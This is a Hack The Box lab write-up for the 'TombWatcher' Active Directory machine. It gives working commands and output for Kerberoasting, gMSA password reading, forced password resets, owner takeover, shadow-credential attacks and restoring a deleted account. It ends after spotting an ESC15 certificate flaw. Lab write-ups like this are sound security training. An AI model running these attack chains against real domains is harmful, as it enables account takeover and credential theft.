HTB | TombWatcher

Machine - https://app.hackthebox.com/machines/TombWatcher

IP - 10.129.13.255

Machine Information - As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.129.13.255 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 11:59 IST
Nmap scan report for 10.129.13.255
Host is up (0.61s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49695/tcp open  unknown
49701/tcp open  unknown
49739/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 257.02 seconds
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49677,49678,49679,49695,49701,49739 10.129.13.255 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 12:12 IST
Nmap scan report for 10.129.13.255
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 10:42:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-08T10:44:11+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:10+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-08T10:43:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.75 seconds

Port 53

└─$ dig ANY @10.129.13.255 tombwatcher.htb

; <<>> DiG 9.20.8-6-Debian <<>> ANY @10.129.13.255 tombwatcher.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54208
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;tombwatcher.htb.               IN      ANY

;; ANSWER SECTION:
tombwatcher.htb.        600     IN      A       10.129.13.255
tombwatcher.htb.        3600    IN      NS      dc01.tombwatcher.htb.
tombwatcher.htb.        3600    IN      SOA     dc01.tombwatcher.htb. hostmaster.tombwatcher.htb. 250 900 600 86400 3600
tombwatcher.htb.        600     IN      AAAA    dead:beef::e7e7:fbeb:fe8d:9099

;; ADDITIONAL SECTION:
dc01.tombwatcher.htb.   1200    IN      A       10.129.13.255
dc01.tombwatcher.htb.   1200    IN      AAAA    dead:beef::e7e7:fbeb:fe8d:9099

;; Query time: 375 msec
;; SERVER: 10.129.13.255#53(10.129.13.255) (TCP)
;; WHEN: Sun Jun 08 12:22:45 IST 2025
;; MSG SIZE  rcvd: 198

Port 80

We can run auxiliary/scanner/http/iis_shortname_scanner to check whether IIS leaks 8.3 short names (tilde enumeration):

msf6 > use auxiliary/scanner/http/iis_shortname_scanner
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 10.129.13.255
rhosts => 10.129.13.255
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[+] Found 1 directories
[+] http://10.129.13.255/aspnet*~1
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

Running dirsearch:

└─$ dirsearch -u http://10.129.13.255/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/TombWatcher/reports/http_10.129.13.255/__25-06-08_12-26-32.txt

Target: http://10.129.13.255/

[12:26:33] Starting: 
[12:27:45] 301 -  158B  - /aspnet_client  ->  http://10.129.13.255/aspnet_client/
[12:28:16] 400 -    3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[12:28:36] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[12:28:36] 400 -    3KB - /jolokia/exec/java.lang:type=Memory/gc            
[12:28:36] 400 -    3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage    
[12:28:36] 400 -    3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[12:28:36] 400 -    3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[12:28:36] 400 -    3KB - /jolokia/write/java.lang:type=Memory/Verbose/true 
                                                                             
Task Completed

We saw the same /aspnet_client/ directory from the IIS shortname scanner, so let's add it to the path and run the scanner again:

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/
path => /aspnet_client/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[+] Found 1 directories
[+] http://10.129.13.255/aspnet_client/system*~1
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

Let's fuzz for system*~1; first, build a wordlist of candidates starting with "system":

└─$ grep "^system" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > system_fuzz.txt

Let's fuzz:

└─$ wfuzz -c -w system_fuzz.txt -u http://10.129.13.255/aspnet_client/FUZZ --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.13.255/aspnet_client/FUZZ
Total requests: 40

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                      
=====================================================================

000000004:   301        1 L      10 W       169 Ch      "system_web"                                                                                                                                                                                                 

Total time: 0
Processed Requests: 40
Filtered Requests: 39
Requests/sec.: 0

Add this to the path and run the IIS shortname scanner again:

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/system_web/
path => /aspnet_client/system_web/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255

[*] Scanning in progress...
[-] Unable to connect to 10.129.13.255
[-] Unable to connect to 10.129.13.255
[+] Found 1 directories
[+] http://10.129.13.255/aspnet_client/system_web/4_0_30*~1
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > 

BloodHound

Since we have credentials, let's collect the domain with BloodHound:

└─$ bloodhound-python -u henry -p 'H3nry_987TGV!'  -d tombwatcher.htb -ns 10.129.13.255 -c All --zip

Foothold/shell

Shell as John

WriteSPN

We found that henry@tombwatcher.htb -> WriteSPN -> Alfred@tombwatcher.htb

The user HENRY@TOMBWATCHER.HTB has the ability to write to the "serviceprincipalname" attribute to the user ALFRED@TOMBWATCHER.HTB.

So let's set an SPN on Alfred:

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated

Now we can Kerberoast Alfred's account:

└─$ netexec ldap tombwatcher.htb -u henry -p 'H3nry_987TGV!' --kerberoasting kerberoast.txt

OR

└─$ impacket-GetUserSPNs -request tombwatcher.htb/henry:'H3nry_987TGV!' -dc-ip 10.129.13.255

Let's crack the TGS hash with hashcat:

└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txt

Now we have Alfred's password (basketball).

Looking back at BloodHound, we get Alfred@tombwatcher.htb -> AddSelf -> Infrastructure@tombwatcher.htb

The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.

By adding itself to the group, ALFRED@TOMBWATCHER.HTB will gain the same privileges that INFRASTRUCTURE@TOMBWATCHER.HTB already has.

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure

ReadGMSAPassword

Infrastructure@tombwatcher.htb -> ReadGMSAPassword -> Ansible_dev@tombwatcher.htb

ANSIBLE_DEV$@TOMBWATCHER.HTB is a Group Managed Service Account. The group INFRASTRUCTURE@TOMBWATCHER.HTB can retrieve the password for the GMSA ANSIBLE_DEV$@TOMBWATCHER.HTB.

Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).

The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

Since we are now a member of the Infrastructure group, we should be able to read ansible_dev$'s GMSA managed password.

There are two ways to get the password. With gMSADumper:

└─$ python3 gMSADumper.py -u Alfred -p basketball -d "tombwatcher.htb"                                                           
Users or groups who can read password for ansible_dev$:
 > Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a

Or with bloodyAD:

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword

distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc
msDS-ManagedPassword.B64ENCODED: IIwfpSnxGqOGf+d99xuIBTCl3yqtm6fvywv4pBqe5PN9jsYcLAWn3x1doYf9ZzjBXGB3XoRzPFNwtajDOG304xGmN2CJ4G+5QsLACGGVvu3ZoG4aosUdfpEGuWyYqSyKggtxHtssw1lWLbrZayfWqascdDtBvuaszTpJgmDnLykE6QP+BmmngEkfETLuZ+hH0pP896TujqasQXFyOBkqwVtvXe1Lx9szud4//XTPoejE0KBihHGhzmbQ8pGH9QR9zl21XsohXJA2dd9QAUwgGpCssBhbOPtAalPoaOYDlBE4wrFZNnrYpADsIeYVO/HmXVnGO1e/9XRjcSCEZaHvTw==

Now we have the NTLM hash of ansible_dev$.

ForceChangePassword

Ansible_DEV$@tombwatcher.htb -> ForceChangePassword -> Sam@tombwatcher.htb

The user ANSIBLE_DEV$@TOMBWATCHER.HTB has the capability to change the user SAM@TOMBWATCHER.HTB's password without knowing that user's current password.

Let's change Sam's password:

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u ansible_dev$ -p :1c37d00093dc2a5f25176bf2d474afdc set password sam "P@ssw0rd@123"
[+] Password changed successfully!

WriteOwner

Sam@tombwatcher.htb -> WriteOwner -> John@tombwatcher.htb

The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

Let's set the owner of John to sam:

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" set owner john sam                            
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john

Shadow Credential

Next, as the new owner, let's grant GenericAll on John (here to Alfred):

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" add genericAll John Alfred
[+] Alfred has now GenericAll on John

Now we can perform the Shadow Credentials attack to get John's NT hash:

└─$ certipy shadow auto -account 'john' -u 'alfred@tombwatcher.htb' -p 'basketball' -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'john'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e'
[*] Adding Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Successfully added Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Authenticating as 'john' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'john@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'john.ccache'
[*] Wrote credential cache to 'john.ccache'
[*] Trying to retrieve NT hash for 'john'
[*] Restoring the old Key Credentials for 'john'
[*] Successfully restored the old Key Credentials for 'john'
[*] NT hash for 'john': ad9324754583e3e42b55aad4d3b8d2bf

Now we can log in over WinRM with the hash (pass-the-hash with evil-winrm) and get user.txt.

Privilege Escalation

John@tombwatcher.htb -> GenericAll -> ADCS@tombwatcher.htb

The user JOHN@TOMBWATCHER.HTB has GenericAll privileges to the OU ADCS@TOMBWATCHER.HTB.

This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

I will check this later (it might get us somewhere).

Tombstone

What are Tombstones in Active Directory?

When you delete an object from the Active Directory (AD) database, it’s marked as a tombstone object instead of being fully removed. By default, each tombstone object remains in the database for 180 days. Once this tombstone’s lifetime value is exceeded, the tombstone object is automatically deleted by the garbage collection process. Administrators can change the default tombstone lifetime value by using the ADSI Edit tool.

The definition above is taken from this article.

*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADObject -Filter {isDeleted -eq $True -and name -ne "Deleted Objects"} -IncludeDeletedObjects -Properties *

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
CN                              : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
codePage                        : 0
countryCode                     : 0
Created                         : 11/15/2024 7:55:59 PM
createTimeStamp                 : 11/15/2024 7:55:59 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/15/2024 7:56:05 PM, 11/15/2024 7:56:02 PM, 12/31/1600 7:00:01 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/15/2024 7:57:59 PM
modifyTimeStamp                 : 11/15/2024 7:57:59 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1109
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133761921597856970
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 12975
uSNCreated                      : 12844
whenChanged                     : 11/15/2024 7:57:59 PM
whenCreated                     : 11/15/2024 7:55:59 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN                              : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:04:05 PM
createTimeStamp                 : 11/16/2024 12:04:05 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:04:21 PM
modifyTimeStamp                 : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762502455822446
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13171
uSNCreated                      : 13161
whenChanged                     : 11/16/2024 12:04:21 PM
whenCreated                     : 11/16/2024 12:04:05 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN                              : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:07:04 PM
createTimeStamp                 : 11/16/2024 12:07:04 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:07:27 PM
modifyTimeStamp                 : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762504248946345
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13197
uSNCreated                      : 13186
whenChanged                     : 11/16/2024 12:07:27 PM
whenCreated                     : 11/16/2024 12:07:04 PM

Remember to pick the LATEST deleted object, as the older ones will have had their permissions revoked.

We can see the deleted object cert_admin; let's bring it back to life!

*Evil-WinRM* PS C:\Users\john\Desktop> Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
*Evil-WinRM* PS C:\Users\john\Desktop> 

GenericAll

Let's check what permissions we have on cert_admin:

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u john -p :ad9324754583e3e42b55aad4d3b8d2bf get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=tombwatcher,DC=htb
permission: WRITE

distinguishedName: CN=john,CN=Users,DC=tombwatcher,DC=htb
permission: WRITE

distinguishedName: OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

We have GenericAll on cert_admin.

Let's use Shadow Credentials to get the hash.

Shadow Credential

└─$ certipy shadow auto -account 'cert_admin' -u 'john@tombwatcher.htb' -hashes ad9324754583e3e42b55aad4d3b8d2bf -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'cert_admin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a7db0ca8-580f-88c1-6ac9-5692216a9609'
[*] Adding Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Successfully added Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Authenticating as 'cert_admin' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'cert_admin@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'cert_admin.ccache'
[*] Wrote credential cache to 'cert_admin.ccache'
[*] Trying to retrieve NT hash for 'cert_admin'
[*] Restoring the old Key Credentials for 'cert_admin'
[*] Successfully restored the old Key Credentials for 'cert_admin'
[*] NT hash for 'cert_admin': f87ebf0febd9c4095c68a88928755773

Now we have the hash for cert_admin.

ESC15

Now we can check for vulnerable templates:

└─$ certipy find -u cert_admin -hashes :f87ebf0febd9c4095c68a88928755773 -target 10.129.13.255 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

We can see ESC15; let's exploit it.

ESC15, also known by the community name "EKUwu" (research by Justin Bollinger from TrustedSec) and tracked as CVE-2024-49019, describes a vulnerability affecting unpatched CAs. It allows an attacker to inject arbitrary Application Policies into a certificate issued from a Version 1 (Schema V1) certificate template. If the CA has not been updated with the relevant security patches (Nov 2024), it will incorrectly include these attacker-supplied Application Policies in the issued certificate. This occurs even if these policies are not defined in, or are inconsistent with, the template's intended Extended Key Usages (EKUs), thereby granting the certificate unintended capabilities.

